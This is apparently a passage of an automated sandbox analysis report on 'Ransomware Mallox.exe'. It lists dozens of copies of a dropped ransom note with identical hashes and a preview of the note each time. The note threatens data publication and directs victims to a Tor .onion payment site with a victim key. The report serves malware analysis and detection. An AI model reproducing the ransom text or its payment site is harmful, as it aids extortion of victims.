                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
